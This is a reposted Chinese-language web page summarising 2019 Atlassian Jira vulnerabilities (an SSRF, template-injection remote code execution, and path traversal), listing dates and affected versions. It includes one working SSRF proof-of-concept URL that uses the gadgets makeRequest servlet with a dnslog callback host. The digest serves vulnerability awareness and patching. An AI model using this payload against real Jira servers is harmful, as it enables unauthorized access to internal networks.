码上欢乐
相关内容   简体   繁体

应用安全 - 软件漏洞 - Atlassian - Jira漏洞汇总

本文转载自  查看原文  2019-10-12 14:08  457    应用安全 
CVE-2019-8451
Date
2019

类型
ssrf 

影响范围

Jira < 8.4.0

 

复现

poc:

/plugins/servlet/gadgets/makeRequest?url=http://xxx.xxx.198.133:8080@xxx.dnslog.cn

CVE-2019-11581  
Date:2019.7
Jira未授权服务端模板注入远程代码执行漏洞

 

CVE-2019-15001 

Date:2019.10

Jira Importers Plugin模板注入漏洞

 

CVE-2019-14994

Date:
2019.10

类型:
Jira服务工作台路径遍历导致的敏感信息泄露漏洞

影响版本:
All versions before 3.9.16
3.10.x
3.11.x
3.12.x
3.13.x
3.14.x
3.15.x
3.16.x before 3.16.8 (the fixed version for 3.16.x)
4.0.x
4.1.x before 4.1.3 (the fixed version for 4.1.x)
4.2.x before 4.2.5 (the fixed version for 4.2.x)
4.3.x before 4.3.4 (the fixed version for 4.3.x)
4.4.0 before 4.4.1 (the fixed version for 4.4.x)


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 (CVE-2019-8449)Atlassian Jira 信息泄露漏洞复现 应用安全 - PHP - CMS - DeDeCMS - 漏洞 - 汇总 应用安全 - 平台 | 工具 - Nexus漏洞汇总 Atlassian JIRA服务器模板注入漏洞复现(CVE-2019-11581) 应用安全 - 中间件 - 解析漏洞 - 路径遍历 - 漏洞 - 汇总 Atlassian产品实践[JIRA+Confluence+Crowd] Atlassian In Action-Jira之核心插件(三) 应用安全 - 工具 | 框架 - Apache - Apache Log4j - 漏洞 - 汇总 应用安全 – 端口漏洞整理 应用安全 - 端口漏洞整理
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM